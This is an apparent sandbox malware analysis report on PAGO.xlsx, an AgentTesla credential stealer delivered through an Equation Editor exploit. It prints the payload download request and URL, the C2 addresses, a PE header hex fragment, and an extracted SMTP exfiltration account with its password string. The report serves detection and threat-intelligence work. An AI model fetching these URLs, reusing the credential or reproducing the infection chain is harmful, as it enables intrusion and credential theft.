Loading ...

Play interactive tourEdit tour

Analysis Report PAGO.xlsx

Overview

General Information

Sample Name:PAGO.xlsx
Analysis ID:383929
MD5:db190ad25a453084bc89ecb5d46d6e0a
SHA1:999aacfcfee17aaa6231cf858af787d5ddce8774
SHA256:4273c2c75793063754de785ea06da2e149f8e659db159e94e73be5b23abdd3a7
Tags:AgentTeslaVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to a URL shortener service
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2184 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2612 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 912 cmdline: 'C:\Users\Public\vbc.exe' MD5: F31B0E7D038ED9D64BE2C6EF94FA5171)
      • vbc.exe (PID: 3048 cmdline: C:\Users\Public\vbc.exe MD5: F31B0E7D038ED9D64BE2C6EF94FA5171)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "helio@lpsinvest.comz6~Rhjss*B0}smtp.lpsinvest.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.vbc.exe.351d880.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                4.2.vbc.exe.351d880.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.153.76.181, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2612, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                  Sigma detected: File Dropped By EQNEDT32EXEShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2612, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: http://wsdysuresbonescagegp.dns.army/documenpt/svchost.exeAvira URL Cloud: Label: malware
                  Found malware configurationShow sources
                  Source: 5.2.vbc.exe.400000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "helio@lpsinvest.comz6~Rhjss*B0}smtp.lpsinvest.com"}
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: wsdysuresbonescagegp.dns.armyVirustotal: Detection: 5%Perma Link
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exeReversingLabs: Detection: 16%
                  Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 16%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: PAGO.xlsxVirustotal: Detection: 33%Perma Link
                  Source: PAGO.xlsxReversingLabs: Detection: 33%
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exeJoe Sandbox ML: detected
                  Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected

                  Exploits:

                  barindex
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: unknownHTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                  Source: global trafficDNS query: name: is.gd
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.25.234.53:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.25.234.53:443

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49166 -> 103.153.76.181:80
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEDNS query: name: is.gd
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.10.29.169:587
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 10:40:38 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Thu, 08 Apr 2021 07:36:25 GMTETag: "dde00-5bf711ad4360e"Accept-Ranges: bytesContent-Length: 908800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 79 b2 6e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 96 0a 00 00 46 03 00 00 00 00 00 9a b4 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 b4 0a 00 4f 00 00 00 00 c0 0a 00 34 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 94 0a 00 00 20 00 00 00 96 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 34 42 03 00 00 c0 0a 00 00 44 03 00 00 98 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0e 00 00 02 00 00 00 dc 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c b4 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 80 3f 00 00 60 48 00 00 03 00 00 00 01 00 00 06 e0 87 00 00 68 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 6c 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0
                  Source: Joe Sandbox ViewIP Address: 5.10.29.169 5.10.29.169
                  Source: Joe Sandbox ViewIP Address: 104.25.234.53 104.25.234.53
                  Source: Joe Sandbox ViewIP Address: 103.153.76.181 103.153.76.181
                  Source: Joe Sandbox ViewASN Name: EVEREST-ASGB EVEREST-ASGB
                  Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.10.29.169:587
                  Source: global trafficHTTP traffic detected: GET /documenpt/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: wsdysuresbonescagegp.dns.army
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B3408F0.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /documenpt/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: wsdysuresbonescagegp.dns.army
                  Source: unknownDNS traffic detected: queries for: is.gd
                  Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: http://AFplKq.com
                  Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: vbc.exe, 00000005.00000002.2370796460.0000000005E70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                  Source: vbc.exe, 00000004.00000002.2169807116.00000000024B8000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: vbc.exe, 00000005.00000002.2369177054.00000000026F4000.00000004.00000001.sdmpString found in binary or memory: http://smtp.lpsinvest.com
                  Source: vbc.exe, 00000005.00000002.2370796460.0000000005E70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                  Source: vbc.exe, 00000005.00000002.2369077883.0000000002636000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                  Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                  Source: vbc.exe, vbc.exe, 00000005.00000002.2368916069.0000000000F82000.00000020.00020000.sdmp, svchost[1].exe.2.drString found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
                  Source: vbc.exe, svchost[1].exe.2.drString found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
                  Source: vbc.exe, vbc.exe, 00000005.00000002.2368916069.0000000000F82000.00000020.00020000.sdmp, svchost[1].exe.2.drString found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                  Source: vbc.exe, 00000004.00000002.2170048529.000000000347C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                  Source: vbc.exe, 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2369171386.00000000026EC000.00000004.00000001.sdmpString found in binary or memory: https://x8nMk45g8ETcNqX.org
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownHTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.22:49165 version: TLS 1.2

                  System Summary:

                  barindex
                  Office equation editor drops PE fileShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exeJump to dropped file
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D5424 NtQueryInformationProcess,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00F82050
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00F846E0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D0288
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D6290
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D83D8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D240B
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D74D9
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D5690
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D27D8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D39C1
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D6AB8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DAAF9
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D3DA0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DE068
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DA149
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D92B0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D92C0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D7340
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DB5B8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DE688
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DA6D8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D27C8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DA93E
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DA908
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DA918
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002DED50
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D0E20
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D9E84
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D6F84
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D0968
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D0C6B
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D0900
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D4D28
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D15F8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D15E9
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D2990
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D1DA8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D49A1
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D1AF0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D4EE7
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D1AE0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_005D4F33
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00F82050
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00F846E0
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_002E5320
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_002E6340
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_002EB418
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_002E5668
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_002E2087
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_002EE5B0
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_002EE610
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00786928
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_007805B8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_007871A8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00787EB8
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0078B298
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_0078B868
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00782910
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00785380
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00DF0048
                  Source: PAGO.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: svchost[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/24@5/3
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PAGO.xlsxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE0FB.tmpJump to behavior
                  Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                  Source: PAGO.xlsxVirustotal: Detection: 33%
                  Source: PAGO.xlsxReversingLabs: Detection: 33%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                  Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: PAGO.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: PAGO.xlsxInitial sample: OLE indicators encrypted = True
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00F98523 push dword ptr [esi+3Fh]; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00F9928F push FFFFFFD9h; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D5B3F push esp; retf
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_002D5B44 push esp; retf
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00F98523 push dword ptr [esi+3Fh]; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00F9928F push FFFFFFD9h; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00781858 pushfd ; retn 001Dh
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00783012 push esp; retf
                  Source: C:\Users\Public\vbc.exeCode function: 5_2_00781678 push esp; retn 001Dh
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.56739593384
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Drops PE files to the user root directoryShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
